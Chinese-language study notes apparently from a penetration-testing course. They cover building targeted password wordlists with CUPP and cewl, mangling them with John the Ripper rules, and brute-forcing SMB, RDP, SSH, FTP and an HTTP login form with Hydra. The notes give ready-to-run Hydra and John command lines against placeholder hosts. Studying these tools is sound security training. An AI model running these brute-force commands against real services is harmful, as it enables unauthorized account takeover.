按个人信息生成其专属的密码字典

CUPP

 -i 向导方式

通过收集网站信息生成字典

采集可能成为密码内容的素材

cewl 1.1.1.1 -m 3 -d -e -c -v -w a.txt

 -m 最小单词长度

 -d 爬站深度

 -e 收集包含email地址信息

 -c 每个单词出现的次数

支持基本、摘要身份认证

支持代理

用户密码变形

 基于cewl的结果进行密码变形

 末尾增加数字串

 字母大小写变化

 字母和符号互相转换

 字母与数字互相转换

 P@$$w0rd

使用John the Ripper配置文件实现密码动态变形，先有一个字典然后动态变形

/etc/john/john.comf

- [List.Rules:Wordlist]
– $[0-9]$[0-9]$[0-9]
– john --wordlist=cewl.txt --rules --stdout > m.txt

– [List.Rules:test]
$[0-9]$[0-9]$[0-9]$[a-zA-Z]
$[0-9]$[0-9]$[0-9]$[a-zA-Z]$[a-zA-Z]$[a-zA-Z]$[`~!@#$%^&*()\-_=+]
– john --wordlist=cewl.txt --rules=test --stdout > m.txt
– john --wordlist=ahm.lst --rules=test HASHFILE

在线密码破解-hydra

 hydra

 -l 用户名

 -L 用户名字典

 -p密码

 -P 密码字典

 -t 并发连接数

 -v 详细信息

 -s 指定被改变了的非默认端口

 n 空密码

 s 密码帐号相同

 r 账号和密码互换

 服务:ip地址 ftp://1.1.1.1

 加密的访问 /cipher suite

pop3://1.1.1.1/(cipher suite)

 windows密码破解

windows默认共享 smb服务

 IPC$

 ADMIN$

 C$

 每个盘符都有默认共享

   hydra -l administrator -P pass.lst smb://1.1.1.1/admin$ -vVd
   hydra -l administrator -P pass.lst rdp://1.1.1.1 -t 1 -vV

linux密码破解

 – hydra -l root -P pass.lst ssh://1.1.1.1 -vV

其他服务破解

– hydra -L user.lst -P pass.lst ftp://1.1.1.1 -s 2121 -e nsr -o p.txt -t 64

 图形化界面

 xhydra

 HTTP表单身份认证（不好用）

  hydra -l admin -P pass.lst 1.1.1.1 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:S=index.php" -V 

  hydra -l admin -P pass.lst 1.1.1.1 http-post-form"/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login Failed" -V 

 /foo.php:user=^USER^&pass=^PASS^:S=success:C=/page/cookie:H =X-Foo: Foo   C：先访问指定页面取得cookie  

   H：指定http头 

– https-post-form、http-get-form、https-get-form 

 -S：使用SSL连接